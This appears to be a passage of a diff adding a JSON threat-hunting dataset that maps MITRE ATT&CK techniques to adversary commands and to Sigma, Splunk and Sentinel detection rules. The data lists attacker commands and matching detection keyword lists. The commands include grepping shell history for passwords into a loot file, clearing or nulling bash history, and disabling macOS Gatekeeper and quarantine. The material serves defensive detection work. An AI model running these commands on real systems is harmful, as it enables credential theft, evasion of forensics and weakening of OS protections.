The legitimate path for the Google update service is C:\\Program Files (x86)\\Google\\Update\\GoogleUpdate.exe so the service names and executable locations used by APT29 are specific enough to be detected in log files.", + "references": [ + "https://www.fireeye.com/blog/threat-research/2017/03/apt29_domain_frontin.html" + ], + "tags": [ + "attack.persistence", + "attack.g0016", + "attack.t1050" + ], + "logsource": { + "product": "windows", + "service": "system" + }, + "detection": { + "service_install": { + "EventID": 7045, + "ServiceName": "Google Update" + }, + "timeframe": "5m", + "condition": "service_install | near process" + }, + "falsepositives": [ + "Unknown" + ], + "level": "high" + }, + { + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "process": { + "Image": [ + "C:\\Program Files(x86)\\Google\\GoogleService.exe", + "C:\\Program Files(x86)\\Google\\GoogleUpdate.exe" + ] + } + } + }, + { + "title": "Turla Service Install", + "id": "1df8b3da-b0ac-4d8a-b7c7-6cb7c24160e4", + "description": "This method detects a service install of malicious services mentioned in Carbon Paper - Turla report by ESET", + "references": [ + "https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/" + ], + "tags": [ + "attack.persistence", + "attack.g0010", + "attack.t1050" + ], + "logsource": { + "product": "windows", + "service": "system" + }, + "detection": { + "selection": { + "EventID": 7045, + "ServiceName": [ + "srservice", + "ipvpn", + "hkmsvc" + ] + }, + "condition": "selection" + }, + "falsepositives": [ + "Unknown" + ], + "level": "high" + }, + { + "title": "StoneDrill Service Install", + "id": "9e987c6c-4c1e-40d8-bd85-dd26fba8fdd6", + "description": "This method detects a service install of the malicious Microsoft Network Realtime Inspection Service service described in StoneDrill report by Kaspersky", + "author": "Florian Roth", + "references": [ + 
"https://securelist.com/blog/research/77725/from-shamoon-to-stonedrill/" + ], + "tags": [ + "attack.persistence", + "attack.g0064", + "attack.t1050" + ], + "logsource": { + "product": "windows", + "service": "system" + }, + "detection": { + "selection": { + "EventID": 7045, + "ServiceName": "NtsSrv", + "ServiceFileName": "* LocalService" + }, + "condition": "selection" + }, + "falsepositives": [ + "Unlikely" + ], + "level": "high" + }, + { + "title": "Turla PNG Dropper Service", + "id": "1228f8e2-7e79-4dea-b0ad-c91f1d5016c1", + "description": "This method detects malicious services mentioned in Turla PNG dropper report by NCC Group in November 2018", + "references": [ + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/november/turla-png-dropper-is-back/" + ], + "author": "Florian Roth", + "date": "2018/11/23", + "tags": [ + "attack.persistence", + "attack.g0010", + "attack.t1050" + ], + "logsource": { + "product": "windows", + "service": "system" + }, + "detection": { + "selection": { + "EventID": 7045, + "ServiceName": "WerFaultSvc" + }, + "condition": "selection" + }, + "falsepositives": [ + "unlikely" + ], + "level": "critical" + }, + { + "title": "Suspicious Driver Load from Temp", + "id": "2c4523d5-d481-4ed0-8ec3-7fbf0cb41a75", + "description": "Detects a driver load from a temporary directory", + "author": "Florian Roth", + "tags": [ + "attack.persistence", + "attack.t1050" + ], + "logsource": { + "product": "windows", + "service": "sysmon" + }, + "detection": { + "selection": { + "EventID": 6, + "ImageLoaded": "*\\Temp\\\\*" + }, + "condition": "selection" + }, + "falsepositives": [ + "there is a relevant set of false positives depending on applications in the environment" + ], + "level": "medium" + }, + { + "title": "Malicious Service Installations", + "id": "5a105d34-05fc-401e-8553-272b45c1522d", + "description": "Detects known malicious service installs that only appear in cases of lateral movement, credential dumping and other 
suspicious activity", + "author": "Florian Roth", + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1050", + "car.2013-09-005" + ], + "logsource": { + "product": "windows", + "service": "system" + }, + "detection": { + "selection": { + "EventID": 7045 + }, + "malsvc_wce": { + "ServiceName": [ + "WCESERVICE", + "WCE SERVICE" + ] + }, + "malsvc_paexec": { + "ServiceFileName": "*\\PAExec*" + }, + "malsvc_winexe": { + "ServiceFileName": "winexesvc.exe*" + }, + "malsvc_pwdumpx": { + "ServiceFileName": "*\\DumpSvc.exe" + }, + "malsvc_wannacry": { + "ServiceName": "mssecsvc2.0" + }, + "malsvc_persistence": { + "ServiceFileName": "* net user *" + }, + "malsvc_others": { + "ServiceName": [ + "pwdump*", + "gsecdump*", + "cachedump*" + ] + }, + "condition": "selection and 1 of malsvc_*" + }, + "falsepositives": [ + "Penetration testing" + ], + "level": "critical" + }, + { + "title": "Rare Service Installs", + "id": "66bfef30-22a5-4fcd-ad44-8d81e60922ae", + "description": "Detects rare service installs that only appear a few times per time frame and could reveal password dumpers, backdoor installs or other types of malicious services", + "status": "experimental", + "author": "Florian Roth", + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1050", + "car.2013-09-005" + ], + "logsource": { + "product": "windows", + "service": "system" + }, + "detection": { + "selection": { + "EventID": 7045 + }, + "timeframe": "7d", + "condition": "selection | count() by ServiceFileName < 5" + }, + "falsepositives": [ + "Software installation", + "Software updates" + ], + "level": "low" + }, + [ + "4657", + "Windows Registry" + ], + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4657", + "Windows Registry" + ], + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ] + ], + "external_reference": [ + 
"https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064518/Carbanak_APT_eng.pdf", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/may/emissary-panda-a-potential-new-malicious-tool/", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/", + "https://www.fireeye.com/blog/threat-research/2014/11/operation_doubletap.html", + "https://www.group-ib.com/blog/cobalt", + "https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/", + "https://www.welivesecurity.com/2018/03/13/oceanlotus-ships-new-backdoor/", + "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf", + "https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf", + "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html" + ] + }, + { + "technique_id": "T1121", + "command_list": [ + "regsvcs.exe *.dll", + "regasm.exe *.dll", + "rundll32.exe *.dll.entrypoint" + ], + "commands": [ + { + "command": "regsvcs.exe *.dll", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "regasm.exe *.dll", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "rundll32.exe *.dll.entrypoint", + "source": "Threat Hunting Tables", + "name": "" + } + ], + "parsed_datasets": [ + { + "chain_id": "100168", + "os": "windows", + "parent_process": "regsvcs.exe", + "commandline_string": "*.dll", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "high", + "mitre_caption": "execution", + "mitre_attack": "T1121", + "itw_sample": "" + }, + { + "chain_id": 
"100169", + "os": "windows", + "parent_process": "regasm.exe", + "commandline_string": "*.dll", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "high", + "mitre_caption": "execution", + "mitre_attack": "T1121", + "itw_sample": "" + }, + { + "chain_id": "100170", + "os": "windows", + "parent_process": "rundll32.exe", + "commandline_string": "*.dll.entrypoint", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "execution", + "mitre_attack": "T1121", + "itw_sample": "" + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 3and (process_path contains \"regsvcs.exe\"or process_path contains \"regasm.exe\")", + "name": "Regsvcs Regasm" + } + ], + "possible_detections": [ + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "ID 1 & 7", + "Sysmon" + ], + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ] + ], + "external_reference": [] + }, + { + "technique_id": "T1028", + "command_list": [ + "powershell Enable-PSRemoting -Force", + "winrm.exe" + ], + "commands": [ + { + "command": "powershell Enable-PSRemoting -Force", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "winrm.exe", + "source": "SysmonHunter - Windows Remote Management", + "name": "" + } + ], + "parsed_datasets": [ + { + "chain_id": "100174", + "os": "windows", + "parent_process": "powershell", + "commandline_string": "Enable-PSRemoting -Force", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "high", + "mitre_caption": "remote_execution", + "mitre_attack": "T1028", + "itw_sample": "" + }, + { + "name": 
"Windows Remote Management", + "description": null, + "level": "medium", + "phase": "Execution, Lateral Movement", + "query": [ + { + "type": "process", + "process": { + "any": { + "pattern": "winrm.exe" + } + } + } + ] + }, + { + "Rules": "ET Open", + "SID": "2026849", + "Signature": "ET POLICY WinRM wsman Access - Possible Lateral Movement", + "Verified": "Yes" + }, + { + "Rules": "ET Open", + "SID": "2026850", + "Signature": "ET USER_AGENTS WinRM User Agent Detected - Possible Lateral Movement", + "Verified": "Yes" + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1 and (process_path contains \"wsmprovhost.exe\"or process_path contains \"winrm.cmd\")and (process_command_line contains \"Enable-PSRemoting -Force\"or process_command_line contains \"Invoke-Command -computer_name\"or process_command_line contains \"wmic*node*process call create\")", + "name": "Windows Remote Management" + }, + { + "product": "Suricata (NSM)", + "query": "ET POLICY WinRM wsman Access - Possible Lateral Movement", + "name": "ET Open Rule" + }, + { + "product": "Suricata (NSM)", + "query": "ET USER_AGENTS WinRM User Agent Detected - Possible Lateral Movement", + "name": "ET Open Rule" + } + ], + "possible_detections": [ + { + "title": "Mimikatz through Windows Remote Management", + "id": "aa35a627-33fb-4d04-a165-d33b4afca3e8", + "description": "Detects usage of mimikatz through WinRM protocol by monitoring access to lsass process by wsmprovhost.exe.", + "references": [ + "https://pentestlab.blog/2018/05/15/lateral-movement-winrm/" + ], + "status": "stable", + "author": "Patryk Prauze - ING Tech", + "logsource": { + "product": "windows", + "service": "sysmon" + }, + "detection": { + "selection": { + "EventID": 10, + "TargetImage": "C:\\windows\\system32\\lsass.exe", + "SourceImage": "C:\\Windows\\system32\\wsmprovhost.exe" + }, + "condition": "selection" + }, + "tags": [ + "attack.credential_access", + "attack.execution", + "attack.t1003", + 
"attack.t1028", + "attack.s0005" + ], + "falsepositives": [ + "low" + ], + "level": "high" + }, + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "5140/5145", + "Net Shares" + ], + [ + "4663", + "File monitoring" + ], + [ + "4624", + "Authentication logs" + ], + [ + "Netflow/Enclave netflow" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "5140/5145", + "Net Shares" + ], + [ + "4663", + "File monitoring" + ], + [ + "4624", + "Authentication logs" + ], + [ + "Netflow/Enclave netflow" + ] + ], + "external_reference": [ + "https://www.secureworks.com/research/bronze-union" + ] + }, + { + "technique_id": "T1138", + "command_list": [ + "*.exe reg add", + "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Custom", + "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\InstalledSDB", + "sdbinst.exe\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Custom|\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\InstalledSDB", + "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Custom|\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\InstalledSDB" + ], + "commands": [ + { + "command": "*.exe reg add", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Custom", + "source": "Threat Hunting Tables", + "name": "registry_path" + }, + { + "command": "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\InstalledSDB", + "source": "Threat Hunting Tables", + "name": "registry_path" + }, + { + "command": "sdbinst.exe\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Custom|\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\InstalledSDB", + "source": "SysmonHunter - Application 
Shimming", + "name": "" + }, + { + "command": "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Custom|\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\InstalledSDB", + "source": "SysmonHunter - Application Shimming", + "name": "" + } + ], + "parsed_datasets": [ + { + "chain_id": "100182", + "os": "windows", + "parent_process": "*.exe", + "commandline_string": "reg add", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Custom", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "application_shimming", + "mitre_attack": "T1138", + "itw_sample": "" + }, + { + "chain_id": "100183", + "os": "windows", + "parent_process": "*.exe", + "commandline_string": "reg add", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\InstalledSDB", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "application_shimming", + "mitre_attack": "T1138", + "itw_sample": "" + }, + { + "name": "Application Shimming", + "description": null, + "level": "medium", + "phase": "Persistence", + "query": [ + { + "type": "process", + "process": { + "image": { + "pattern": "sdbinst.exe" + }, + "cmdline": { + "pattern": "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Custom|\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\InstalledSDB" + } + } + }, + { + "type": "reg", + "reg": { + "path": { + "pattern": "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Custom|\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\InstalledSDB" + } + } + } + ] + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 11and file_name contains 
\"C:\\\\Windows\\\\AppPatch\\\\Custom\\\\\"", + "name": "Application Shimming FileAccess" + }, + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1and process_path contains \"sdbinst.exe\"", + "name": "Application Shimming Process" + }, + { + "product": "Azure Sentinel", + "query": "Sysmon| where (EventID == 12 or EventID == 13 or EventID == 14)and registry_key_path contains \"\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\InstalledSDB\\\\\"", + "name": "Application Shimming Registry" + } + ], + "possible_detections": [ + { + "title": "Possible Shim Database Persistence via sdbinst.exe", + "id": "517490a7-115a-48c6-8862-1a481504d5a8", + "status": "experimental", + "description": "Detects installation of a new shim using sdbinst.exe. A shim can be used to load malicious DLLs into applications.", + "references": [ + "https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html" + ], + "tags": [ + "attack.persistence", + "attack.t1138" + ], + "author": "Markus Neis", + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "Image": [ + "*\\sdbinst.exe" + ], + "CommandLine": [ + "*.sdb*" + ] + }, + "condition": "selection" + }, + "falsepositives": [ + "Unknown" + ], + "level": "high" + }, + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "4657", + "Windows Registry" + ], + [ + "Loaded DLLs" + ], + [ + "System calls" + ], + [ + "Sysmon ID 7", + "Loaded DLLs" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "4657", + "Windows Registry" + ], + [ + "System calls" + ] + ], + "external_reference": [ + "https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html" + ] + }, + { + "technique_id": "T1139", + "command_list": [ + "bash cat ~/.bash_history | grep -e '-p ' -e 'pass' -e 'ssh' > loot.txt", + "bash cat ~/.bash_history | 
grep -e '-p ' -e 'pass' -e 'ssh' > out.txt", + "python/collection/linux/pillage_user", + "python/collection/osx/pillage_user", + "cat #{bash_history_filename} | grep #{bash_history_grep_args} > #{output_file}", + "cat .bash_history | grep password > bash.txt" + ], + "commands": [ + { + "command": "bash cat ~/.bash_history | grep -e '-p ' -e 'pass' -e 'ssh' > loot.txt", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "bash cat ~/.bash_history | grep -e '-p ' -e 'pass' -e 'ssh' > out.txt", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "python/collection/linux/pillage_user", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "python/collection/osx/pillage_user", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "cat #{bash_history_filename} | grep #{bash_history_grep_args} > #{output_file}", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "cat .bash_history | grep password > bash.txt", + "source": "Kirtar22/Litmus_Test", + "name": "" + } + ], + "parsed_datasets": [ + { + "chain_id": "100190", + "os": "mac", + "parent_process": "bash", + "commandline_string": "cat ~/.bash_history | grep -e '-p ' -e 'pass' -e 'ssh' > loot.txt", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "high", + "mitre_caption": "bash_history", + "mitre_attack": "T1139", + "itw_sample": "" + }, + { + "chain_id": "100201", + "os": "linux", + "parent_process": "bash", + "commandline_string": "cat ~/.bash_history | grep -e '-p ' -e 'pass' -e 'ssh' > out.txt", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", 
+ "frequency": "high", + "mitre_caption": "bash_history", + "mitre_attack": "T1139", + "itw_sample": "" + }, + { + "Empire Module": "python/collection/linux/pillage_user", + "ATT&CK Technique #1": "T1139", + "ATT&CK Technique #2": "T1212", + "Technique": "Bash History", + "Concatenate for Python Dictionary": "\"python/collection/linux/pillage_user\": [\"T1139\",\"T1212\"]," + }, + { + "Empire Module": "python/collection/osx/pillage_user", + "ATT&CK Technique #1": "T1139", + "ATT&CK Technique #2": "T1033", + "Technique": "Bash History", + "Concatenate for Python Dictionary": "\"python/collection/osx/pillage_user\": [\"T1139\",\"T1033\"]," + } + ], + "queries": [ + { + "product": "Splunk", + "query": "index=linux sourcetype=\"linux_audit\" syscall=257 key=bash_history_changes | table host,auid,syscall,syscall_name,exe", + "name": "" + }, + { + "product": "Splunk", + "query": "index=linux sourcetype=bash_history cat bash_history | table _time,host,user_name,bash_command", + "name": "" + } + ], + "possible_detections": [ + "auditlogs (audit.rules)", + "bash_history logs" + ], + "external_reference": [] + }, + { + "technique_id": "T1146", + "command_list": [ + "bash unset HISTFILE", + "bash export HISTFILESIZE=0", + "bash history -c", + "bash rm ~/.bash_history", + "bash cat /dev/null > ~/.bash_history", + "```", + "rm ~/.bash_history", + "echo \" \" > .bash_history", + "cat /dev/null > ~/.bash_history", + "ln -sf /dev/null ~/.bash_history", + "truncate -s0 ~/.bash_history", + "unset HISTFILE", + "export HISTFILESIZE=0", + "history -c" + ], + "commands": [ + { + "command": "bash unset HISTFILE", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "bash export HISTFILESIZE=0", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "bash history -c", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "bash rm ~/.bash_history", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "bash cat 
/dev/null > ~/.bash_history", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "```", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "rm ~/.bash_history", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "echo \" \" > .bash_history", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "cat /dev/null > ~/.bash_history", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "ln -sf /dev/null ~/.bash_history", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "truncate -s0 ~/.bash_history", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "unset HISTFILE", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "export HISTFILESIZE=0", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "history -c", + "source": "Kirtar22/Litmus_Test", + "name": "" + } + ], + "parsed_datasets": [ + { + "chain_id": "100191", + "os": "mac", + "parent_process": "bash", + "commandline_string": "unset HISTFILE", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "defense_evasion", + "mitre_attack": "T1146", + "itw_sample": "" + }, + { + "chain_id": "100192", + "os": "mac", + "parent_process": "bash", + "commandline_string": "export HISTFILESIZE=0", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "defense_evasion", + "mitre_attack": "T1146", + "itw_sample": "" + }, + { + "chain_id": "100193", + "os": "mac", + "parent_process": "bash", + "commandline_string": "history -c", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + 
"frequency": "high", + "mitre_caption": "defense_evasion", + "mitre_attack": "T1146", + "itw_sample": "" + }, + { + "chain_id": "100194", + "os": "mac", + "parent_process": "bash", + "commandline_string": "rm ~/.bash_history", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "high", + "mitre_caption": "defense_evasion", + "mitre_attack": "T1146", + "itw_sample": "" + }, + { + "chain_id": "100195", + "os": "mac", + "parent_process": "bash", + "commandline_string": "cat /dev/null > ~/.bash_history", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "high", + "mitre_caption": "defense_evasion", + "mitre_attack": "T1146", + "itw_sample": "" + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1and (process_command_line contains \"*rm (Get-PSReadlineOption).HistorySavePath*\"or process_command_line contains \"*del (Get-PSReadlineOption).HistorySavePath*\"or process_command_line contains \"*Set-PSReadlineOption \u2013HistorySaveStyle SaveNothing*\"or process_command_line contains \"*Remove-Item (Get-PSReadlineOption).HistorySavePath*\")", + "name": "Clear Command History" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + }, + { + "product": "Splunk", + "query": "index=linux sourcetype=linux_audit syscall=263 | table time,host,auid,uid,euid,exe,key", + "name": "" + }, + { + "product": "Splunk", + "query": "index=linux sourcetype=linux_audit type=PATH name=.bash_history nametype=delete | table time,name,nametype", + "name": "" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + }, + { + "product": "Splunk", + "query": "index=linux sourcetype=\"linux_audit\" bash_history_changes 
exe!=/home/ec2-user/splunk/bin/splunkd syscall=257 a2!=0 AND a3!=0 | table host,syscall,syscall_name,exe,auid", + "name": "" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + }, + { + "product": "Splunk", + "query": "a2!=0 and a3!=0 are added in to the query to distinuish echo and cat - both logs Systemcall 257 (openat). Morover, when a user logsin through ssh - SYSCALL 257 is used with exe=/usr/bin/bash (2 events generated)for /home/$USER/.bash_history; however in that case the command arguments a2=0 and a3=0 ; when we use command \"echo \" \"> .bash_history\" the same systemcall (257) and the same exe = /usr/bin/bash is used however command arguments a2!=0 and a3!=0.", + "name": "" + }, + { + "product": "Splunk", + "query": "index=linux sourcetype=\"linux_audit\" bash_history_changes exe!=/home/ec2-user/splunk/bin/splunkd syscall=257 exe=/usr/bin/bash a2!=0 AND a3!=0| table host,syscall,syscall_name,exe,auid", + "name": "" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + }, + { + "product": "Splunk", + "query": "-a always,exit -F arch=b64 -F PATH=/home/ec2-user/.bash_history -S unlinkat -F auid>=1000 -F auid!=4294967295 -F key=delete_bash_history", + "name": "" + }, + { + "product": "Splunk", + "query": "-w /home/ec2-user/.bash_history -p rwa -k bash_history_changes", + "name": "" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + }, + { + "product": "Splunk", + "query": "index=linux sourcetype=\"bash_history\" \"rm * .bash_history\"", + "name": "" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + } + ], + "possible_detections": [ + "auditlogs (audit.rules)", + "bash_history logs", + { + "title": "Clear Command History", + "id": "fdc88d25-96fb-4b7c-9633-c0e417fdbd4e", + "status": "experimental", + "description": "Clear command history in linux which is used for defense evasion.", + "references": [ + 
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1146/T1146.yaml", + "https://attack.mitre.org/techniques/T1146/", + "https://www.hackers-arise.com/single-post/2016/06/20/Covering-your-BASH-Shell-Tracks-AntiForensics" + ], + "author": "Patrick Bareiss", + "date": "2019/03/24", + "logsource": { + "product": "linux" + }, + "detection": { + "keywords": [ + "rm *bash_history", + "echo \"\" > *bash_history", + "cat /dev/null > *bash_history", + "ln -sf /dev/null *bash_history", + "truncate -s0 *bash_history", + "export HISTFILESIZE=0", + "history -c", + "history -w", + "shred *bash_history" + ], + "condition": "keywords" + }, + "falsepositives": [ + "Unknown" + ], + "level": "high", + "tags": [ + "attack.defense_evasion", + "attack.t1146" + ] + } + ], + "external_reference": [] + }, + { + "technique_id": "T1147", + "command_list": [ + "bash sudo xattr -r -d com.apple.quarantine /path/to/*.app" + ], + "commands": [ + { + "command": "bash sudo xattr -r -d com.apple.quarantine /path/to/*.app", + "source": "Threat Hunting Tables", + "name": "" + } + ], + "parsed_datasets": [ + { + "chain_id": "100196", + "os": "mac", + "parent_process": "bash", + "commandline_string": "sudo xattr -r -d com.apple.quarantine /path/to/*.app", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "high", + "mitre_caption": "defense_evasion", + "mitre_attack": "T1147", + "itw_sample": "" + } + ], + "queries": [], + "possible_detections": [], + "external_reference": [] + }, + { + "technique_id": "T1148", + "command_list": [ + "bash sudo spctl --master-disable", + "```", + "export HISTCONTROL=ignoreboth" + ], + "commands": [ + { + "command": "bash sudo spctl --master-disable", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "```", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "export HISTCONTROL=ignoreboth", + 
"source": "Kirtar22/Litmus_Test", + "name": "" + } + ], + "parsed_datasets": [ + { + "chain_id": "100197", + "os": "mac", + "parent_process": "bash", + "commandline_string": "sudo spctl --master-disable", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "high", + "mitre_caption": "defense_evasion", + "mitre_attack": "T1148", + "itw_sample": "" + } + ], + "queries": [ + { + "product": "Splunk", + "query": "```", + "name": "" + }, + { + "product": "Splunk", + "query": "index=linux sourcetype=\"bash_history\" export HISTCONTROL | table host, user_name, bash_command", + "name": "" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + } + ], + "possible_detections": [ + "bash_history logs" + ], + "external_reference": [] + }, + { + "technique_id": "T1155", + "command_list": [ + "osascript do shell script echo \\\"import ", + "osascript -e 'tell app \"System Preferences\" to activate'", + "python/persistence/osx/mail" + ], + "commands": [ + { + "command": "osascript do shell script echo \\\"import ", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "osascript -e 'tell app \"System Preferences\" to activate'", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "python/persistence/osx/mail", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "chain_id": "100198", + "os": "mac", + "parent_process": "osascript", + "commandline_string": "do shell script echo \\\"import ", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "high", + "mitre_caption": "applescript", + "mitre_attack": "T1155", + "itw_sample": "" + }, + { + "chain_id": "100199", + "os": "mac", + "parent_process": 
